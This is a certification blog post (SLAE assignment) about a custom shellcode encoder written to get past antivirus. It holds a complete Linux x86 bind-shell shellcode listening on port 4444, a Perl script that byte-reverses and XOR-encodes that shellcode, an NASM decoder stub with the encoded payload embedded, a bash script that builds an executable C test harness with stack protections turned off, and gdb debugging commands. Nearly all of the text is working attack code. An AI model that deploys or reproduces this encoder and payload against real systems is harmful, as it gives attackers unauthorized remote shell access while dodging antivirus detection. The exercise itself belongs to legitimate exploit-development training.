This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-644
GitHub resource containing challenge files:
Local link to source files:
Task was to create a custom encoder to be able to bypass antivirus using a stack based shellcode. I chose to use the bind shellcode created in challenge #1.
My custom encrypter works as the followings:
First I have created a Perl script, that generates the encrypted shellcode for the Assembly tool. My script is much more than necessary, as I like to create things like this. I'll only use the last output (reversed XOR) of the script, but plan to do the encoder for my mixed-mode encryptor as well.
Perl script generating the code:
#!/usr/bin/perl print "#############################################################################\n"; print "This tool will read the bytecode, replace the values starting from the edges.\n"; print "It will also add a nop sled to the end if the number of bytes is odd.\n"; print "e.g: code: ABCDE -> ABCDE0 -> 0EDCBA\n"; print "#############################################################################\n"; #bind shellcode on 4444 $code="\x31\xc0\xb0\x66\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x5b\x31\xd2\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x53\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x59\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"; #test #$code="\x41\x42\x43\x44"; #ABCD->DCBA $secret="\x26"; #code to use as hexa encryption key $issue=0; $issue2=0; #put the hex representation in $codeh $codeh=unpack("H*",$code); $codelen=length($code); print "[+] Hexa code:\n".$codeh."\n"; print "Hexa length : ".$codelen."\n"; #print out the code using /x $hexor_print=""; for ($i1=0;$i1<$codelen;$i1++) { $encoded=unpack("H*",substr($code,$i1,1)); $hexor_print=$hexor_print.",0x".$encoded; if ($encoded eq "00") {$issue="[!] WARNING: code contains \"0x00\"...likely cannot be executed as something!!!";print $issue."\n";exit(1);}; if ($encoded eq "bb") {$issue="[!] WARNING: code contains \"0xbb\"...likely cannot be executed as something!!!";print $issue."\n";exit(1);}; } print "\n[+] Original shellcode:\n".$hexor_print."\n"; print "___________________________________\n"; #put the hex representation in $secreth $secreth=unpack("H*",$secret); $secretlen=length($secret); print "Secret : 0x".$secreth."\n"; print "Secret lenght : ".$secretlen."\n"; print "___________________________________\n"; #determine if length of code can be divided by 2 or nor #if not, r1 will be <>0 $len1=$codelen / 2; $rem1=$codelen % 2; #if length is not dividable by 2, we will add a nop sled at the end print "Old Length : ".$codelen."\n"; print "Divided : ".$len1."\n"; print "Remainder : ".$rem1."\n"; if ($rem1 ne 0) {$codeh=$codeh."90"}; $code=pack("H*",$codeh); $codelen=length($code); print "New Length : ".$codelen."\n"; print "Added $rem1 nop: 0x90\n"; print "[+] Extended:\n".$codeh."\n"; print "___________________________________\n"; print "\n"; $newcode=""; #do the mixing and reversing of chars. #mixing: read first,last, put them beside each other. Result e.g: code: ABCDE0 -> 0AEBDC #reversing: read first, last and exchange them. Result e.g.: ABCDE0 -> 0EDCBA #print "Changes:\n"; @codearray[$codelen]; for ($i1=0;$i1<$len1;$i1++) { $first=substr($codeh,$i1*2,2); $last=substr($codeh,($codelen-1-$i1)*2,2); $newcode=$newcode.$last.$first; #mixing @codearray[$i1]=$last; #revesing 1 @codearray[$codelen-1-$i1]=$first; #reversing 2 # print $i1.":".$first." <-> ".($codelen-1-$i1).":".$last."\n"; } #print out the code as raw hexa print "[+] Raw crazymixed code:\n".$newcode."\n"; #print out the code using /x $hexor_print=""; $issue=0; for ($i1=0;$i1<$codelen;$i1++) { $encoded=substr($newcode,$i1*2,2); $hexor_print=$hexor_print.",0x".$encoded; if ($encoded eq "00") {$issue=1;$issue2=1;}; if ($encoded eq "bb") {$issue=2;$issue2=1;}; if ($encoded eq "61") {$issue=3;$issue2=1;}; if ($encoded eq "a0") {$issue=4;$issue2=1;}; if ($encoded eq "c6") {$issue=5;$issue2=1;}; } if ($issue eq "1") {print "[!] WARNING: MIXED code contains \"0x00\"...likely cannot be executed as something!!!\n";} if ($issue eq "2") {print "[!] WARNING: MIXED code contains \"0xbb\"...likely cannot be executed as something!!!\n";} if ($issue eq "3") {print "[!] WARNING: MIXED code contains \"0x61\"...likely cannot be executed as something!!!\n";} if ($issue eq "4") {print "[!] WARNING: MIXED code contains \"0xa0\"...likely cannot be executed as something!!!\n";} if ($issue eq "5") {print "[!] WARNING: MIXED code contains \"0xc6\"...likely cannot be executed as something!!!\n";} print "\n[+] Crazymixed shellcode:\n".$hexor_print."\n"; print "\nCodelength: $codelen\n\n"; #encrypt using XOR $hexor_print=""; $hexor=""; $issue=0; for ($i=0;$i<$codelen;$i++) { $encoded=unpack('H*',substr($code,$i,1)^$secret); $hexor=$hexor.$encoded; $hexor_print=$hexor_print.",0x".$encoded; if ($encoded eq "00") {$issue=1;$issue2=1;}; if ($encoded eq "bb") {$issue=2;$issue2=1;}; if ($encoded eq "61") {$issue=3;$issue2=1;}; if ($encoded eq "a0") {$issue=4;$issue2=1;}; if ($encoded eq "c6") {$issue=5;$issue2=1;}; } if ($issue eq "1") {print "[!] WARNING: XOR code contains \"0x00\"...likely cannot be executed as something!!!\n";} if ($issue eq "2") {print "[!] WARNING: XOR code contains \"0xbb\"...likely cannot be executed as something!!!\n";} if ($issue eq "3") {print "[!] WARNING: XOR code contains \"0x61\"...likely cannot be executed as something!!!\n";} if ($issue eq "4") {print "[!] WARNING: XOR code contains \"0xa0\"...likely cannot be executed as something!!!\n";} if ($issue eq "5") {print "[!] WARNING: XOR code contains \"0xc6\"...likely cannot be executed as something!!!\n";} print "[+] XOR encrypted crazymixed raw:\n".$hexor."\n"; print "\n[+] XOR encrypted crazymixed shellcode\n".$hexor_print."\n"; print "\nCodelength: $codelen\n\n"; print "[+] Reversed code:\n"; foreach $i (@codearray) { print $i; } print "\n"; print "\n[+] Reversed shellcode:\n"; $codelen1=0; foreach $i (@codearray) { $codelen1++; print ",0x".$i; } print "\n"; print "\nCodelength: $codelen1\n\n"; #encrypt using XOR print "\n"; $hexor_print=""; $hexor=""; $codelen1=0; $issue=0; foreach $x1 (@codearray) { $codelen1++; $encoded=unpack("H*",pack("H*",$x1)^$secret); $hexor=$hexor.$encoded; $hexor_print=$hexor_print.",0x".$encoded; if ($encoded eq "00") {$issue=1;$issue2=1;}; if ($encoded eq "bb") {$issue=2;$issue2=1;}; if ($encoded eq "61") {$issue=3;$issue2=1;}; if ($encoded eq "a0") {$issue=4;$issue2=1;}; if ($encoded eq "c6") {$issue=5;$issue2=1;}; } if ($issue eq "1") {print "[!] WARNING: XOR code contains \"0x00\"...likely cannot be executed as something!!!\n";} if ($issue eq "2") {print "[!] WARNING: XOR code contains \"0xbb\"...likely cannot be executed as something!!!\n";} if ($issue eq "3") {print "[!] WARNING: XOR code contains \"0x61\"...likely cannot be executed as something!!!\n";} if ($issue eq "4") {print "[!] WARNING: XOR code contains \"0xa0\"...likely cannot be executed as something!!!\n";} if ($issue eq "5") {print "[!] WARNING: XOR code contains \"0xc6\"...likely cannot be executed as something!!!\n";} print "[+] XOR encrypted reversed raw:\n".$hexor."\n"; print "\n[+] XOR encrypted reversed shellcode\n".$hexor_print."\n"; print "\nCodelength: ".$codelen1."\n\n"; print "#############################################################################\n"; if ($issue ne "0") {print "\n[!] Exit: Issues were found, check above!\n";} else {print "\n[+] Exit: No issues!\n";} print "Issue: $issue"; exit(1);
Assembly code doing the decryption and execution:
global _start section .text _start: jmp short call_shellcode decoder: pop esi ;pointer to shellcode push esi ;save pointer for later use xor eax, eax ;clear first, XOR-operand register xor ebx, ebx ;clear first, XOR-operand register xor ecx, ecx ;clear first, XOR-operand register xor edx, edx ;clear first, XOR-operand register mov cl,len ;set ECX counter to length of code, this will be decreased by one by "loop" command mov edx,ecx ;save length of code into edx dec edx ;adjust for the loop (-1) shr ecx,1 ;divide ecx by 2^1, so counter will not step over the half of the code myloop: mov al, byte [esi] ;get first byte from the encoded shellcode ; maybe xchg is better xor al,0x26 mov ah, byte [esi+edx] ;get last byte from the encoded shellcode ; maybe xchg is better xor ah,0x26 mov byte [esi], ah ;put first byte to the last position in shellcode mov byte [esi+edx], al ;put last byte to the first position in shellcode sub edx,2 ;decrease the pointer to the last byte by 2 inc esi ;increase starting pointer loop myloop ;repeat and decrease ecx by 1 jmp short Shellcode call_shellcode: call decoder ;shellcode is bind on port 4444 Shellcode: db 0xa6,0xeb,0x2d,0x96,0xc4,0xaf,0x76,0xc7,0xaf,0x76,0xc5,0xaf,0x48,0x4f,0x44,0x09,0x4e,0x4e,0x55,0x09,0x09,0x4e,0x76,0xe6,0x17,0xdf,0x5f,0x6f,0xa6,0xeb,0x19,0x96,0x24,0x97,0x7f,0xb5,0xa6,0xeb,0xc7,0xaf,0x70,0x74,0x74,0x23,0x95,0x40,0x96,0xa6,0xeb,0xc7,0xaf,0x70,0x75,0x22,0x95,0x40,0x96,0xa6,0xeb,0xc7,0xaf,0x70,0x77,0x36,0x4c,0xc7,0xaf,0x75,0x40,0x7a,0x37,0x4e,0x40,0x74,0xf4,0x17,0x7d,0x40,0x96,0xe0,0xaf,0xa6,0xeb,0xc7,0xaf,0x24,0x4c,0x75,0x65,0x75,0xfd,0x17,0x40,0x96,0xe6,0x17 len: equ $-Shellcode
Compiler generated to automate the process of compiling:
#!/bin/bash echo '[+] Assembling with Nasm ... ' nasm -f elf32 -o $1.o $1.nasm echo '[+] Linking ...' ld -o $1 $1.o echo '[+] Objdump ...' mycode=`objdump -d ./$1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\\x/g'|paste -d '' -s |sed 's/^/"/' | sed 's/$/"/g'` echo '[+] Assemble shellcode C ...' echo "#include<stdio.h>" >shellcode.c echo "#include<string.h>" >>shellcode.c echo "unsigned char code[] = \\" >>shellcode.c echo $mycode";" >>shellcode.c echo "main()" >>shellcode.c echo "{" >>shellcode.c echo "printf(\"Shellcode Length: %d\n\", strlen(code));" >>shellcode.c echo " int (*ret)() = (int(*)())code;" >>shellcode.c echo " ret();" >>shellcode.c echo "}" >>shellcode.c echo '[+] Compile shellcode.c' gcc -fno-stack-protector -z execstack shellcode.c -o shellcode echo '[+] Done!'
A little text file containing the commands used to analyze the assembly code in debugger:
./ ch04 gdb ./shellcode set disassembly-flavor intel break main run break *&code continue display /x $edi display /x $esi display /x $eip display /x $edx display /x $ecx display /x $ebx display /x $eax display /x $al display /x $ah define hook-stop disassemble $eip,+10 x/96xb $esi end stepi
Below is how the debugging looks like before reversing the bytes of the code:
Below is how the debugging looks like after reversing the bytes of the code:
Below is how the debugging looks like after XOR decrypting the reversed bytes of the code:
Below is how the disassebly of the decrypted code looks like:
Below is how the execution of the code looks like: